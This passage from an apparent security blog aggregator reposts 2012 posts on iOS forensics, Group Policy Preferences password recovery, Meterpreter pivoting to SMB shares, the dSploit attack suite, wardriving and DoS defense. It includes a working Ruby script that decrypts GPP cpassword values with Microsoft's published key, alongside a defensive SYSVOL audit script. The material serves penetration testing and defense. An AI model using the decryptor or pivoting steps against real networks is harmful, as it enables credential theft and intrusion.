This would typically be accomplished using a tool such as Cellebrite, XRY, Lantern, Elcomsoft, MPE or the Zdziarski method [1]. The result of using one of these tools would either be a bit stream (dd) or a DMG image file that could then be analyzed manually or using a forensic analysis tool.<br />
<br />
<b>File system dump</b><br />
A file system dump, which is a subset of a physical image, could be performed by several well-known tools such as Cellebrite, Blacklight, Oxygen or XRY.<br />
<br />
<b>AFC backup</b><br />
Apple File Connection (AFC) is used with iTunes to conduct a device backup and can be used to perform a backup of data from the device. For example, EnCase v7 can acquire an iOS device using this technology (requires iTunes to be installed, but not running). An examiner can also look for backups on a computer the device has previously been connected to as another step to analyze data from the device without having access to the device itself:<br />
<ul><li>Windows XP: c:\Documents and Settings\\Application Data\Apple Computer\MobileSync\Backup</li>
<li>Windows Vista/7/8: c:\users\\AppData\Roaming\Apple Computer\MobileSync\Backup</li>
<li>OSX: ~/Library/Application Support/MobileSync/Backup</li>
</ul>Depending on the version of iOS & iTunes, the backup can be protected with a password, which is used to encrypt the backed up data. This password is independent from the device passcode.<br />
<br />
<b>File System Encryption</b><br />
Figure 1: iOS data protection overview (source: http://images.apple.com/iphone/business/docs/iOS_Security_Oct12.pdf)<br />
Starting with iOS 4 Apple began providing data protection for user data by encrypting the user partition. With the introduction of the iPhone 3GS (and continuing to the current iPhone 5 hardware device), Apple began including a hardware key that is used as part of the encryption process. This means that the physical device is needed in order to get all the components (keys) to successfully decrypt files that are protected with this level of encryption. iOS 5 introduced an additional layer of protection by encrypting files with individual keys. Apple has defined four levels (classes) of protection for user data:<br />
<ul><li><b>NSFileProtectionNone</b>: The file has no special protections associated with it. It can be read from or written to at any time. Available in iOS 4.0 and later. Declared in NSFileManager.h.</li>
<li><b>NSFileProtectionComplete</b>: The file is stored in an encrypted format on disk and cannot be read from or written to while the device is locked or booting. Available in iOS 4.0 and later. Declared in NSFileManager.h.</li>
<li><b>NSFileProtectionCompleteUnlessOpen</b>: The file is stored in an encrypted format on disk and must be opened while the device is unlocked. Once open, your app may continue to access the file normally, even if the user locks the device. Available in iOS 5.0 and later. Declared in NSFileManager.h.</li>
<li><b>NSFileProtectionCompleteUntilFirstUserAuthentication</b>: The file is stored in an encrypted format on disk and cannot be accessed until after the device has booted. After the user unlocks the device for the first time, your app can access the file and continue to access it even if the user subsequently locks the device. Available in iOS 5.0 and later. Declared in NSFileManager.h.</li>
</ul>The default class for all files that are not otherwise assigned to a different data protection class is NSFileProtectionNone. This level uses individual keys for each file, but the keys are protected with a single system key so all the user data can be easily ‘erased’ during a reset (not really erased, it just deletes the system key and therefore the individual keys and data can never be recovered), but the key is easily viewed forensically since the system key can easily be obtained, without the need of the hardware key on the device itself. This level is not really meant to protect data, but rather provide a quick way to render data unreadable/unrecoverable. Each installed user application can dictate what class level to store the data generated by that application, but many use the default. The other levels of data protection incorporate the use of the hardware key that is unique for each particular device. This means that while you may be able to collect a physical image of an iPhone 4 or 5 and read the image file system, you cannot view unencrypted versions of the files themselves. If you have the device passcode and can obtain a file dump, you can however analyze the logical files, but will not be able to search unallocated space.<br />
<br />
<b>iOS Decryption with IEF 6.1.1</b><br />
Internet Evidence Finder 6.1.1 introduced the ability to search an iOS image and files that may be protected with data encryption by providing the keys that are obtained by Cellebrite during the physical extraction process. IEF now looks for the associated .UFD file that the UFED creates during a physical extraction. The necessary keys are recorded in the .UFD file and IEF can now use those keys to decrypt data that is protected by only the system key.<br />
<br />
<b>Loading an iOS image into Internet Evidence Finder</b><br />
Mobile phone support was added in IEF v6.1 and loading an image of an iOS device is very similar to loading an image of a hard drive. From the main splash screen, simply choose the “Mobile” option, iOS, then “Images”. You can point IEF directly to a bin, dmg or dd file.<br />
<br />
<b>Loading a file dump into Internet Evidence Finder</b><br />
If you have obtained a logical file dump, you can follow the same steps as above, but instead choose the “File Dump” option and select the root folder that contains all the files you want to analyze. From this point you can continue to add more smartphone images, hard drive images or files you want to search before proceeding to the artifact selection page. Once completed, IEF will display all the found artifacts placed in their respective categories.<br />
<br />
<b>Loading iOS backup files into Internet Evidence Finder</b><br />
iOS backup files are normally found on a computer hard drive. Therefore, to include iOS backup files in the artifact search, select the computer hard drive from the main “Images” option, then be sure to select the “iOS backups” option from the artifact selection screen.<br />
<br />
<b>Summary</b><br />
Depending on how you have acquired data from the iOS device, you have three distinct options to analyze it with IEF:<br />
<ul><li><b>Physical Image</b> (bin file from Cellebrite, DMG from Lantern or other ‘dd’ type image): Use IEF Advanced and choose the ‘iOS’->’Images’ option. If you used a Cellebrite UFED to extract the physical image and have the associated .UFD file, make sure it is in the same directory as the Cellebrite physical image file (.bin) and IEF will automatically look for the .UFD file and use any keys that are present to decrypt user data.</li>
<li><b>File Dump</b>: Use IEF Advanced and choose the ‘iOS’->’File Dump’ option, then point IEF to the root of the file dump folder.</li>
<li><b>iOS Backup Files</b>: Use IEF Standard or IEF Advanced and choose ‘iOS Backup’ from the Mobile Backups artifact category.</li>
</ul>As always, I appreciate the feedback, comments or questions. You can reach me anytime at lance(at) magnetforensics(dot)com. Special thanks to Ryan Kubasiak from Blackbag Technologies for some of the detailed iOS encryption information and document references.</blockquote>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-68582261529229582372012-10-19T06:31:00.001-07:002012-10-19T06:31:42.646-07:00Group Policy Preferences and Getting Your Domain 0wned<a href="http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html">Group Policy Preferences and Getting Your Domain 0wned</a>: So I put this link out on Twitter but forgot to put it on the blog.<br />
<br />
I did a talk at the Oct 2012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.<br />
<br />
I've run into this on a few tests where people are taking advantage of this extremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wn everything :-)<br />
<br />
So here are the slides:<br />
<br />
<div style="margin-bottom: 5px;"><strong> <a href="http://www.slideshare.net/chrisgates/exploiting-group-policy-preferences" title="Exploiting Group Policy Preferences">Exploiting Group Policy Preferences</a> </strong> from <strong><a href="http://www.slideshare.net/chrisgates">chrisgates</a></strong> <br />
<br />
Blog post explaining the issue in detail:<br />
<a href="http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences">http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences</a><br />
<br />
Metasploit post module:<br />
<a href="http://metasploit.com/modules/post/windows/gather/credentials/gpp">http://metasploit.com/modules/post/windows/gather/credentials/gpp</a><br />
<br />
PowerShell module to do it:<br />
<a href="http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html">http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html</a><br />
<br />
I ended up writing some Ruby to do it (the blog post has some Python) because the Metasploit module was downloading the XML file to loot but taking a poop prior to getting to the decode part. Now you can do it yourself:<br />
<br />
<br />
<pre><code>require 'rubygems'
require 'openssl'
require 'base64'

encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"

def decrypt(encrypted_data)
  # GPP strips the base64 '=' padding; restore it (none when the length is already a multiple of 4)
  padding = "=" * ((4 - (encrypted_data.length % 4)) % 4)
  epassword = "#{encrypted_data}#{padding}"
  decoded = Base64.decode64(epassword)

  # AES-256 key Microsoft published for the cpassword attribute
  key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
  aes = OpenSSL::Cipher.new("AES-256-CBC")
  aes.decrypt
  aes.key = key
  aes.iv = "\x00" * 16   # the scheme uses an all-zero IV
  plaintext = aes.update(decoded) + aes.final

  # the password is stored as UTF-16LE; convert it to a readable UTF-8 string
  plaintext.force_encoding("UTF-16LE").encode("UTF-8")
end

blah = decrypt(encrypted_data)
puts blah</code></pre><br />
In Action:<br />
<pre><code>user@ubuntu:~$ ruby gpp-decrypt-string.rb
Local*P4ssword!</code></pre><br />
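Decrypting one string proves the point; a domain admin cleaning this up wants to find every cpassword still sitting in SYSVOL. The Ruby below is an added example, not CG's script or the Metasploit module: it walks a Groups.xml document (the sample is constructed, only the cpassword value is the one from the post) and reports each account whose password is recoverable with the published key, so the preference can be removed and the password rotated. The IV, the padding rule and the SYSVOL path in the comments are assumptions from the scheme as the public decryptors implement it.

```ruby
require 'openssl'
require 'base64'
require 'rexml/document'

# AES-256 key Microsoft published for the cpassword attribute of Group Policy
# Preference XML files (the same 32 bytes as in the script above, written as hex).
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')

# Decrypt one cpassword value. GPP strips the base64 '=' padding, so it is
# restored first; the scheme is AES-256-CBC with the public key and an all-zero
# IV, and the plaintext is the UTF-16LE password (PKCS#7 padded).
def decrypt_cpassword(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  cipher = OpenSSL::Cipher.new('AES-256-CBC')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = "\x00" * 16
  plain = cipher.update(Base64.strict_decode64(padded)) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# Audit one preference XML document (Groups.xml here; the same attribute can
# appear in other preference files). Returns one finding per element carrying a
# non-empty cpassword. A value that fails to decrypt is still reported, just
# without the cleartext, because its presence alone means the policy needs fixing.
def audit_preference_xml(xml_text, source = 'Groups.xml')
  doc = REXML::Document.new(xml_text)
  findings = []
  doc.elements.each('//Properties[@cpassword]') do |props|
    cpassword = props.attributes['cpassword']
    next if cpassword.nil? || cpassword.empty?
    finding = {
      source:   source,
      user:     props.attributes['userName'] || props.parent.attributes['name'],
      action:   props.attributes['action'],
      password: nil
    }
    begin
      finding[:password] = decrypt_cpassword(cpassword)
    rescue ArgumentError, OpenSSL::Cipher::CipherError, EncodingError
      # malformed or truncated value: keep the finding, skip the cleartext
    end
    findings << finding
  end
  findings
end

# Constructed Groups.xml fragment shaped like the file GPP writes under the
# policy's Machine\Preferences\Groups\ folder in SYSVOL (path is an assumption).
# The first cpassword is the one from the post; the second is deliberately
# garbage to exercise the failure path. Names and uids are made up.
SAMPLE_GROUPS_XML = <<~XML
  <Groups>
    <User name="LocalAdmin" changed="2012-10-01 10:00:00" uid="{00000000-0000-0000-0000-000000000000}">
      <Properties action="U" userName="LocalAdmin" changeLogon="0" noChange="1" neverExpires="1"
                  cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/>
    </User>
    <User name="Helpdesk" changed="2012-10-01 10:05:00" uid="{00000000-0000-0000-0000-000000000001}">
      <Properties action="C" userName="Helpdesk" cpassword="not-base64!!"/>
    </User>
  </Groups>
XML

if $PROGRAM_NAME == __FILE__
  audit_preference_xml(SAMPLE_GROUPS_XML).each do |f|
    shown = f[:password] ? "password recoverable: #{f[:password]}" : 'cpassword present, could not decrypt'
    puts "#{f[:source]}: user #{f[:user]} (action #{f[:action]}) - #{shown}"
  end
end
```

Every finding, decryptable or not, is a preference item to delete and a local account whose password must be changed, since anyone who can read SYSVOL has had the key all along.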
</div>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-18598884241862678372012-10-18T06:36:00.001-07:002012-10-18T06:36:09.919-07:00DerbyCon 2012 - Security Vulnerability Assessments – Process and Best Practices<a href="http://feedproxy.google.com/~r/SecurityTube/~3/QrIEE92gq54/5940">DerbyCon 2012 - Security Vulnerability Assessments – Process and Best Practices</a>: Conducting regular security assessments on the organizational network and computer systems has become a vital part of protecting information-computing assets. Security assessments are a proactive and offensive posture towards information security as compared to the traditional reactive and defensive stance normally implemented with the use of Access Control Lists (ACLs) and firewalls.<br />
<br />
To effectively conduct a security assessment so it is beneficial to an organization, a proven methodology must be followed so the assessors and assessees are on the same page.<br />
<br />
This presentation will evaluate the benefits of credential scanning, scanning in a virtual environment, distributed scanning as well as vulnerability management.<br />
<br />
BIO:<br />
Kellep Charles (@kellepc) is the creator and Executive Editor of SecurityOrb.com (@SecurityOrb), an information security & privacy knowledge-based website with the mission to share and raise awareness of the motives, tools and tactics of the black-hat community, and provide best practices and counter measures against malicious events.<br />
Kellep works as a government contractor in the Washington, DC area as an Information Security Analyst with over 15 years of experience in the areas of incident response, computer forensics, security assessments, malware analysis and security operations.<br />
Currently he is completing his Doctorate in Information Assurance at Capitol College with a concentration in Artificial Neural Networks (ANN) and Human Computer Interaction (HCI). He also holds a Master of Science in Telecommunication Management from the University of Maryland University College and a Bachelor of Science in Computer Science from North Carolina Agriculture and Technical State University.<br />
<br />
He has served as an Adjunct Professor at Capitol College in their Computer Science department. His industry certifications include Certified Information Systems Security Professional (CISSP), Cisco Certified Network Associate (CCNA), Certified Information Systems Auditor (CISA), National Security Agency – INFOSEC Assessment Methodology (NSA-IAM) and Information Technology Infrastructure Library version 3 (ITILv3) to name a few.Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-56383266074005160592012-10-18T06:34:00.001-07:002012-10-18T06:34:15.848-07:00Wigle Wifi Wardriving meets Google Earth for Neat Wifi MapsFirst take your handy dandy Android device and install <a href="https://play.google.com/store/apps/details?id=net.wigle.wigleandroid&hl=en" style="color: #1122cc; font-family: arial, sans-serif; white-space: nowrap;"><em style="font-style: normal; font-weight: bold;">Wigle</em><span style="color: #1122cc; font-family: arial,sans-serif;"> Wifi </span><em style="font-style: normal; font-weight: bold;">Wardriving</em></a>.<br />
<div><br />
</div><div>It uses the internal GPS and wifi to log access points, their security level and their GPS Position.</div><div><br />
</div><div>It looks like this (yup, I stole these):</div><div><br />
</div><div style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-RWcrZ4JcB0s/UHd9NlW-Z9I/AAAAAAAAA6E/B5Ax6NINvrg/s1600/droid-wigle-ap.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-RWcrZ4JcB0s/UHd9NlW-Z9I/AAAAAAAAA6E/B5Ax6NINvrg/s320/droid-wigle-ap.jpg" width="191" /></a></div><div style="clear: both; text-align: center;">List of access points</div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Of2F9Ab5iOg/UHd9TgXvE5I/AAAAAAAAA6M/bjmo5GkOkag/s1600/droid-wigle-map.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-Of2F9Ab5iOg/UHd9TgXvE5I/AAAAAAAAA6M/bjmo5GkOkag/s320/droid-wigle-map.jpg" width="191" /></a></div><div style="clear: both; text-align: center;">Also makes a cute map on your phone</div><div style="clear: both; text-align: left;"><br />
</div><div style="clear: both; text-align: left;">Once you have the APs you can export the "run" from the data section. Yes, yes, the stolen photo says "settings", but if you install it today it will say "data" there now.</div><div style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-clnYt_J4yXo/UHd9jg5QcbI/AAAAAAAAA6U/XOCV5t5-sDU/s1600/droid-wigle-kml.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-clnYt_J4yXo/UHd9jg5QcbI/AAAAAAAAA6U/XOCV5t5-sDU/s320/droid-wigle-kml.jpg" width="191" /></a></div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: left;">With the KML export you can import that directly into Google Earth and make all sorts of neat maps by toggling the data.</div><div style="clear: both; text-align: left;"><br />
</div><div style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-W_ZnVMKh4BY/UHd-X15PdtI/AAAAAAAAA6c/5gHMPbC5fOI/s1600/all-points.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="http://2.bp.blogspot.com/-W_ZnVMKh4BY/UHd-X15PdtI/AAAAAAAAA6c/5gHMPbC5fOI/s320/all-points.PNG" width="320" /></a></div><div style="clear: both; text-align: center;">All Access Points</div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-XbQ_ICM0nqI/UHd-nGGC6EI/AAAAAAAAA6k/-k5Zc_cbqsM/s1600/open-access-point.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="http://1.bp.blogspot.com/-XbQ_ICM0nqI/UHd-nGGC6EI/AAAAAAAAA6k/-k5Zc_cbqsM/s320/open-access-point.PNG" width="320" /></a></div><div style="clear: both; text-align: center;">Open Access Points</div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MMuQc2OCZ1c/UHd-xVw68jI/AAAAAAAAA6s/AJUBz7Tlgpo/s1600/wep-access-points.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-MMuQc2OCZ1c/UHd-xVw68jI/AAAAAAAAA6s/AJUBz7Tlgpo/s320/wep-access-points.PNG" width="319" /></a></div><div style="clear: both; text-align: center;">WEP Encrypted Access Points</div><div style="clear: both; text-align: center;"><br />
</div><div style="clear: both; text-align: left;">That's it.</div><div style="clear: both; text-align: left;"><br />
</div><div style="clear: both; text-align: left;">-CG</div>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-79095915549753736652012-10-18T06:30:00.001-07:002012-10-18T06:30:43.594-07:00Mounting SMB shares over Meterpreter<br />
OK, this is pretty straightforward, no magic:<br />
<img alt="Screen Shot 2012 10 17 at 11 00 16 AM" border="0" height="141" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.00.16%20AM.png?fileId=20660662" title="Screen Shot 2012-10-17 at 11.00.16 AM.png" width="416" /><br />
Got a shell, doesn't have to be SYSTEM<br />
<img alt="Screen Shot 2012 10 17 at 11 00 44 AM" border="0" height="54" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.00.44%20AM.png?fileId=20660663" title="Screen Shot 2012-10-17 at 11.00.44 AM.png" width="454" /><br />
Add a route to the internal range or directly to the host you want over the session you want<br />
<img alt="Screen Shot 2012 10 17 at 11 01 23 AM" border="0" height="197" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.01.23%20AM.png?fileId=20660664" title="Screen Shot 2012-10-17 at 11.01.23 AM.png" width="481" /><br />
Mosey on over to the Socks4a module. In another terminal we need to make sure our proxychains.conf file in /etc/ (or wherever you store your conf) is correct.<br />
<img alt="Screen Shot 2012 10 17 at 10 52 29 AM" border="0" height="93" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2010.52.29%20AM.png?fileId=20660666" title="Screen Shot 2012-10-17 at 10.52.29 AM.png" width="184" /><br />
It defaults to 9050 on 127.0.0.1 for Tor; that's pretty easy to cope with and there's no reason to mess with it if you actually use it for Tor for other things.<br />
<img alt="Screen Shot 2012 10 17 at 11 03 00 AM" border="0" height="398" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.03.00%20AM.png?fileId=20660667" title="Screen Shot 2012-10-17 at 11.03.00 AM.png" width="456" /><br />
Run the socks proxy with the Tor-like settings. (Remember to shutdown Tor first)<br />
<img alt="Screen Shot 2012 10 17 at 11 04 34 AM" border="0" height="71" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.04.34%20AM.png?fileId=20660668" title="Screen Shot 2012-10-17 at 11.04.34 AM.png" width="600" /><br />
And the rest is gravy. The % (percent sign, if the blog software mangles it) is a delimiter that smbclient and other Samba tools recognize between user and password (so it doesn't prompt you for it).<br />
And just to love it working:<br />
<img alt="Screen Shot 2012 10 17 at 11 04 53 AM" border="0" height="217" src="http://www.room362.com/resource/Screen%20Shot%202012-10-17%20at%2011.04.53%20AM.png?fileId=20660669" title="Screen Shot 2012-10-17 at 11.04.53 AM.png" width="600" /><br />
Yay, files. Yes, I know I didn't use smbmount, but it works the same, as does rpcclient.<br />
A side note here is if you are using the pth-tools from:<br />
<a href="https://code.google.com/p/passing-the-hash/">https://code.google.com/p/passing-the-hash/</a><br />
You can use hashes instead of passwords for stuff like this. But who are we kidding? Who doesn't get clear text passwords anymore ;-)<br />
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-65590217004687158722012-10-10T05:55:00.001-07:002012-10-10T05:55:14.567-07:00dSploit - An Android network penetration suite<a href="http://security-sh3ll.blogspot.com/2012/10/dsploit-android-network-penetration.html">dSploit - An Android network penetration suite</a>: <br />
<div style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-jmVNsegGtfA/UHUuQ_TA9nI/AAAAAAAABFM/tZ84a4HcTps/s1600/8.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="112" src="http://3.bp.blogspot.com/-jmVNsegGtfA/UHUuQ_TA9nI/AAAAAAAABFM/tZ84a4HcTps/s200/8.png" width="200" /></a></div><i><a href="https://github.com/evilsocket/dsploit">dSploit</a> is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks<br />
</i><b><i>the most complete and advanced professional toolkit</i></b><i> to perform network security assessments on a mobile device.</i><br />
<br />
<i>Once dSploit is started, you will be able to easily map your network, fingerprint live hosts' operating systems<br />
and running services, search for </i><b><i>known vulnerabilities</i></b><i>, crack logon procedures of many TCP protocols, perform<br />
man-in-the-middle attacks such as </i><b><i>password sniffing</i></b><i> (with common protocol dissection), real-time </i><b><i>traffic<br />
manipulation</i></b><i>, etc.</i><br />
<br />
<i>This application is still in </i><b><i>beta stage</i></b><i>; a stable release will be available as soon as possible, but expect<br />
some crashes or strange behaviour until then. In any case, feel free to submit an issue on GitHub.</i><br />
<br />
<h2><span style="font-size: small;">Requirements:</span></h2><ul><li><i>An Android device with at least version 2.3 (Gingerbread) of the OS.</i></li>
<li><i>The device </i><b><i>must be rooted</i></b><i>.</i></li>
<li><i>The device must have a BusyBox </i><b><i>full install</i></b><i>, meaning with </i><b><i>every</i></b><i> utility installed (not the partial installation).</i></li>
</ul><b>Available Modules</b><br />
<br />
<ul><li><b>RouterPWN</b><br />
<br />
<i>Launch the <a href="http://routerpwn.com/" rel="nofollow">http://routerpwn.com/</a> service to pwn your router.</i></li>
<li><b>Port Scanner</b><br />
<br />
<i>A SYN port scanner to quickly find open ports on a single target.</i></li>
<li><b>Inspector</b><br />
<br />
<i>Performs deep detection of the target operating system and services; slower than the SYN port scanner but more accurate.</i></li>
<li><b>Vulnerability Finder</b><br />
<br />
<i>Searches the National Vulnerability Database for known vulnerabilities in the target's running services.</i></li>
<li><b>Login Cracker</b><br />
<br />
<i>A very fast network logon cracker which supports many different services.</i></li>
<li><b>Packet Forger</b><br />
<br />
<i>Craft and send a custom TCP or UDP packet to the target.</i></li>
<li><b>MITM</b> <br />
<br />
<i>A set of man-in-the-middle tools to command &amp; conquer the whole network.</i></li>
</ul><br />
<br />
<b>Download: <a href="https://github.com/evilsocket/dsploit/downloads">https://github.com</a></b><br />
<br />
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-87411826516672063712012-10-10T05:53:00.001-07:002012-10-10T05:53:31.526-07:00Defending Against DoS Attacks: Defense Part 1, the Network<a href="https://securosis.com/blog/defending-against-dos-attacks-defense-part-1-the-network">Defending Against DoS Attacks: Defense Part 1, the Network</a>: <br />
In <a href="https://securosis.com/blog/defending-against-dos-attacks-the-attacks">Attacks</a>, we discussed both network-based and application-targeting Denial of Service (DoS) attacks. Given the radically different techniques between the types, it’s only logical that we use different defense strategies for each type. But be aware that aspects of both network-based and application-targeting DoS attacks are typically combined for maximum effect. So your DoS defenses need to be comprehensive, protecting against (aspects of) both types. Anti-DoS products and services you will consider defend against both. This post will focus on defending against network-based volumetric attacks.<br />
<br />
First the obvious: you cannot just throw bandwidth at the problem. Your adversaries likely have an unbounded number of bots at their disposal and are getting smarter at using shared virtual servers and cloud instances to magnify the amount of evil bandwidth at their disposal. So you can’t just hunker down and ride it out. They likely have a bigger cannon than you can handle. You need to figure out how to deal with a massive amount of traffic and separate good traffic from bad, while maintaining availability. Find a way to dump bad traffic before it hoses you somehow without throwing the baby (legitimate application traffic) out with the bathwater.<br />
<br />
We need to be clear about the volume we are talking about. Recent attacks have blasted upwards of 80-100 Gbps of network traffic at targets. Unless you run a peering point or some other network-based service, you probably don’t have that kind of inbound bandwidth. Keep in mind that even if you have big enough pipes, the weak link may be the network security devices connected to them. Successful DoS attacks frequently target network security devices and overwhelm their session management capabilities. Your huge expensive IPS might be able to handle 80 Gbps of traffic in ideal circumstances, but fall over due to session table overflow. Even if you could get a huge check to deploy another network security device in front of your ingress firewall to handle that much traffic, it’s probably not the right device for the job.<br />
<br />
Before you just call up your favorite anti-DoS service provider, ISP, or content delivery network (CDN) and ask them to scrub your traffic, that approach is no silver bullet either. It’s not like you can just flip a switch and have all your traffic instantly go through a scrubbing center. Redirecting traffic incurs latency, assuming you can even communicate with the scrubbing center (remember, your pipes are overwhelmed with attack traffic). Attackers choose a mix of network and application attacks based on what’s most effective in light of your mitigations.<br />
<br />
No, we aren’t only going to talk about more problems, but it’s important to keep everything in context. Security is not a problem you can ever <em>solve</em> – it’s about figuring out how much loss you can accept. If a few hours of downtime is fine, then you can do certain things to ensure you are back up within that timeframe. If <em>no</em> downtime is acceptable you will need a different approach. There are no right answers – just a series of trade-offs to manage to the availability requirements of your business, within the constraints of your funding and available expertise.<br />
<br />
Handling network-based attacks involves mixing and matching a number of different architectural constructs, involving both customer premise devices and network-based service offerings. Many vendors and service providers can mix and match between several offerings, so we don’t have a set of vendors to consider here. But the discussion illustrates how the different defenses play together to blunt an attack.<br />
<br />
<h2>Customer Premise-based Devices</h2><br />
The first category of defenses is based around a device on the customer premises. These appliances are purpose-built to deal with DoS attacks. Before you turn your nose up at the idea of installing another box to solve such a specific problem, take another look at your perimeter. There is a reason you have all sorts of different devices. The existing devices already in your perimeter aren’t particularly well-suited to dealing with DoS attacks. As we mentioned, your IPS, firewall, and load balancers aren’t designed to manage an extreme number of sessions, nor are they particularly adept at dealing with obfuscated attack traffic which looks legitimate. Nor can other devices integrate with network providers (to automatically change network routes, which we will discuss later) – or include out-of-the-box DoS mitigation rules, dashboards, or forensics, built specifically to provide the information you need to ensure availability under duress.<br />
<br />
So a new category of DoS mitigation devices has emerged to deal with these attacks. They tend to include both optimized IPS-like rules to prevent floods and other network anomalies, and simple web application firewall capabilities which we will discuss in the next post. Additionally, we see a number of anti-DoS features such as session scalability, combined with embedded IP reputation capabilities, to discard traffic from known bots without full inspection. To understand the role of IP reputation, let’s recall how email connection management devices enabled anti-spam gateways to scale up to handle spam floods. It’s computationally expensive to fully inspect every inbound email, so dumping messages from known bad senders first enables inspection to focus on email that might be legitimate, and keeps mail flowing. The same methodology applies here.<br />
<br />
These devices should be as close to the perimeter as possible, to get rid of the maximum amount of traffic before the attack impacts anything else. Some devices can be deployed out-of-band as well, to monitor network traffic and pinpoint attacks. Obviously monitor-and-alert mode is less useful than blocking, which helps maintain availability in real time. And of course you will want a high-availability deployment – an outage due to a failed security device is likely to be even more embarrassing than simply succumbing to a DoS.<br />
<br />
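The reputation-first triage described above, as an added example that is not part of the Securosis post or any vendor's product: a small model of a premise device that drops flows from a reputation feed before spending any session-table capacity on them, then caps sessions per source and in total so one chatty bot cannot fill the table. The CIDR range, the limits and the flows are constructed for the demonstration (RFC 5737 documentation addresses), and the feed is a hypothetical list of CIDRs rather than any real vendor format.<br />

```go
package main

import (
	"fmt"
	"net"
)

// Flow is one inbound session request as a premise anti-DoS device sees it.
// The records fed in below are constructed samples, not captured traffic.
type Flow struct {
	Src string // source IP address
	Dst string // destination host:port
}

// Verdict is the device's decision for a single flow.
type Verdict string

const (
	DropReputation Verdict = "drop:reputation" // source is on the reputation feed
	DropPerSource  Verdict = "drop:per-source" // source already holds its session quota
	DropCapacity   Verdict = "drop:capacity"   // session table is full
	Accept         Verdict = "accept"
)

// Triage orders the checks from cheapest to most expensive: known-bad senders
// are discarded before any session state is allocated, so the session table
// is spent only on sources that might be legitimate.
type Triage struct {
	MaxSessions  int          // total session-table capacity
	MaxPerSource int          // sessions one source may hold at once
	BadNets      []*net.IPNet // hypothetical reputation feed, as CIDR ranges

	sessions map[string]int // open sessions per source
	total    int            // open sessions overall
	Counts   map[Verdict]int
}

// NewTriage builds a device model from its limits and a CIDR reputation feed.
func NewTriage(maxSessions, maxPerSource int, badCIDRs []string) (*Triage, error) {
	t := &Triage{MaxSessions: maxSessions, MaxPerSource: maxPerSource,
		sessions: map[string]int{}, Counts: map[Verdict]int{}}
	for _, c := range badCIDRs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			return nil, err
		}
		t.BadNets = append(t.BadNets, n)
	}
	return t, nil
}

func (t *Triage) badSource(ip net.IP) bool {
	for _, n := range t.BadNets {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// Process decides on one flow, updates the session table and the tallies.
func (t *Triage) Process(f Flow) Verdict {
	v := t.decide(f)
	t.Counts[v]++
	return v
}

func (t *Triage) decide(f Flow) Verdict {
	ip := net.ParseIP(f.Src)
	if ip == nil || t.badSource(ip) {
		return DropReputation // unparsable or listed: no inspection spent
	}
	if t.sessions[f.Src] >= t.MaxPerSource {
		return DropPerSource
	}
	if t.total >= t.MaxSessions {
		return DropCapacity
	}
	t.sessions[f.Src]++
	t.total++
	return Accept
}

// Close releases a session when the connection ends.
func (t *Triage) Close(src string) {
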